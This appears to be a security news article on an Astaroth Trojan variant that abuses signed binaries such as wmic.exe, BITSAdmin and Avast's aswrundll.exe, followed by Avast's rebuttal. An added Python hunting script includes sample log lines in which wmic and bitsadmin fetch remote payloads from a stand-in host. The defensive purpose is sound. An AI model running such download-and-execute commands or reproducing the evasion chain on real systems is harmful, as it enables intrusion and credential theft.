A newly published report from the Nocturnus Research team at Cybereason reveals how an Astaroth Trojan variant uses Avast antivirus software to gain information about the target system.
This particular Astaroth campaign requires the victim to download a .7zip file containing a .lnk file that initialises the malware itself. This then spawns a process using the Windows Management Instrumentation Command-line utility (wmic.exe) to launch an XSL script processing attack, in which wmic.exe fetches and executes a remote script.
This remote script contains well-obfuscated code that uses several functions to hide from antivirus defences and researchers alike. The script initiates the download of the payload files, disguised as images and extension-less files, which contain the Trojan modules.
This is where things get really interesting.
A Cybereason Active Hunting Service spokesperson said that the "analysis of the tools and techniques used in the Astaroth campaign show how truly effective these methods are at evading antivirus products". The techniques in question involved using the Avast antivirus Runtime Dynamic Link Library 'aswrundll.exe' to load a malicious module that then loads further malicious modules and gathers information about the machine.
One of these modules collects and exfiltrates clipboard data, password information and more.
aswrundll.exe is very similar to Microsoft’s own rundll32.exe, which has also been used by malicious actors over the years, as it enables the execution of DLLs by calling their exported functions.
These are what have become known as 'Living Off the Land Binaries', or LOLBins for short.
Cybereason warns that "because of the great potential for malicious exploitation inherent in the use of LOLBins, it's very likely many other information stealers will adopt this method to deliver their payload into targeted machines".
The Astaroth Trojan itself is nothing new, but Cybereason researchers reckon this new variant differs 'dramatically' from those that have gone before in several ways. As well as downloading the payload using the Background Intelligent Transfer Service utility (BITSAdmin), rather than the certutil.exe command-line tool, it also uses a fromCharCode() deobfuscation method so that it never writes its execution commands out explicitly, where they might reveal what it is up to.
The researchers note that earlier versions of Astaroth would quit if Avast antivirus was detected, whereas this variant makes use of the LOLBins method to 'inject' a malicious module into one of Avast's own processes.
It also makes malicious use of the uninstaller process 'unins000.exe', belonging to a Brazilian information security company called GAS Tecnologia, to gather information undetected. That information includes users’ keystrokes, operating system calls and anything saved to the clipboard, collected continuously.
In conjunction with the network password recovery tool netpass.exe, it also gathers user login passwords undetected, including those for remote computers on the LAN and for mail and messenger accounts.
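The chain described above (wmic.exe pulling a remote XSL script, BITSAdmin fetching the payload, and a trusted loader such as aswrundll.exe or rundll32.exe running a module from a user-writable folder) is visible in process-creation telemetry even though every binary involved is legitimately signed. The following script is an added example and is not code from the Cybereason report, from SC Media or from Avast; it runs a handful of hunting rules over constructed log lines in a simplified Sysmon-style `parent|image|command_line` format. The URLs, user name, file names and the assumption that aswrundll.exe takes the module path on its command line are all constructed for the example.

```python
"""Hunting rules for an Astaroth-style LOLBin chain over process-creation logs.

Added example (not from the Cybereason report). Log format is a constructed,
simplified Sysmon Event ID 1 style:  parent_image|image|command_line
"""
import re
from dataclasses import dataclass

# Paths an ordinary user can write to; a signed loader pulling a module from
# here is far more suspicious than one loading from Program Files.
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|downloads)|\\temp\\|\\public\\|\\programdata\\", re.I
)
REMOTE_URL = re.compile(r"https?://", re.I)
# wmic's documented /format: switch accepts a URL, which is what makes the
# remote XSL script processing technique work.
WMIC_REMOTE_FORMAT = re.compile(r'/format:\s*"?https?://', re.I)


@dataclass(frozen=True)
class ProcEvent:
    parent: str
    image: str
    cmdline: str


def parse_line(line: str) -> ProcEvent:
    """Split one constructed log line into its three fields."""
    parent, image, cmdline = line.split("|", 2)
    return ProcEvent(parent.strip().lower(), image.strip().lower(), cmdline.strip())


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list[str]:
    """Return the names of every rule the event matches (empty list if benign)."""
    hits: list[str] = []
    img = basename(ev.image)
    # Stage 1: wmic.exe asked to render output with a stylesheet hosted remotely.
    if img == "wmic.exe" and WMIC_REMOTE_FORMAT.search(ev.cmdline):
        hits.append("wmic_remote_xsl")
    # Stage 2: bitsadmin used as a downloader rather than for its usual job-management role.
    if img == "bitsadmin.exe" and re.search(r"/transfer", ev.cmdline, re.I) \
            and REMOTE_URL.search(ev.cmdline):
        hits.append("bitsadmin_download")
    # Stage 3: a trusted DLL loader handed a module that lives in a user-writable path.
    # (Assumption for this example: the module path appears on the command line.)
    if img in ("aswrundll.exe", "rundll32.exe") and USER_WRITABLE.search(ev.cmdline):
        hits.append("lolbin_module_from_user_path")
    # Cross-cutting signal: wmic.exe normally has no business spawning other programs;
    # children of wmic.exe are the remote script doing its work.
    if basename(ev.parent) == "wmic.exe" and img != "wmic.exe":
        hits.append("spawned_by_wmic")
    return hits


def hunt(log_text: str) -> list[tuple[str, list[str]]]:
    """Return (command_line, [matched rules]) for every event that matched at least one rule."""
    findings = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        rules = classify(ev)
        if rules:
            findings.append((ev.cmdline, rules))
    return findings


def stages_seen(log_text: str) -> list[str]:
    """Distinct rule names observed across the whole log, sorted for stable output."""
    return sorted({rule for _, rules in hunt(log_text) for rule in rules})


def chain_score(log_text: str) -> int:
    """Number of distinct stages observed; two or more in one session merits triage."""
    return len(stages_seen(log_text))


# Constructed sample telemetry: three malicious-looking events followed by three
# benign uses of the same binaries, to show the rules do not fire on the binaries alone.
SAMPLE_LOG = """\
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic os get /format:"https://example.invalid/stage.xsl"
C:\\Windows\\System32\\wbem\\WMIC.exe|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /transfer job /download /priority high https://example.invalid/img.png C:\\Users\\alice\\AppData\\Local\\Temp\\img.png
C:\\Windows\\explorer.exe|C:\\Program Files\\Avast Software\\Avast\\aswrundll.exe|"C:\\Program Files\\Avast Software\\Avast\\aswrundll.exe" C:\\Users\\alice\\AppData\\Local\\Temp\\modulea
C:\\Windows\\explorer.exe|C:\\Windows\\System32\\wbem\\WMIC.exe|wmic os get caption
C:\\Windows\\System32\\svchost.exe|C:\\Windows\\System32\\bitsadmin.exe|bitsadmin /list
C:\\Program Files\\Avast Software\\Avast\\AvastSvc.exe|C:\\Program Files\\Avast Software\\Avast\\aswrundll.exe|"C:\\Program Files\\Avast Software\\Avast\\aswrundll.exe" "C:\\Program Files\\Avast Software\\Avast\\defs\\something.dll"
"""

if __name__ == "__main__":
    for cmdline, rules in hunt(SAMPLE_LOG):
        print(f"{', '.join(rules):40s} {cmdline}")
    print("distinct stages:", chain_score(SAMPLE_LOG))
```

The point of the last three sample lines is Corrons' argument in the quotes below: what distinguishes abuse from normal use is the behaviour, not the binary. wmic.exe rendering local output, bitsadmin listing jobs and aswrundll.exe loading a module from its own install directory all pass, while the same three binaries fetching remote code or loading from a user's temp folder trip a rule each.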
"As Avast is the most common antivirus software in the world, this is an effective evasive strategy," the Cybereason report states. That is a claim Avast itself disputes.
"Misusing a trusted binary is a known issue that can’t be avoided," Luis Corrons, security evangelist at Avast, told SC Media UK. "In this instance, they are using an Avast file to run a binary in a similar way that a DLL using Windows' rundll32.exe can run."
However, Corrons emphasised that this is not an injection and that installed Avast binaries have self-protection mechanisms to avoid injections anyway.
As far as Astaroth is concerned, Corrons said, "Knowing that attackers make use of this technique is exactly why our Behavior Shield monitors the actions that take place on a computer, even if said actions are carried out by a trusted application."
So, if that behaviour is the expected one, there will be no action; but if there are abnormalities that indicate malicious activity, "Avast will take care of the potential threat," Corrons said.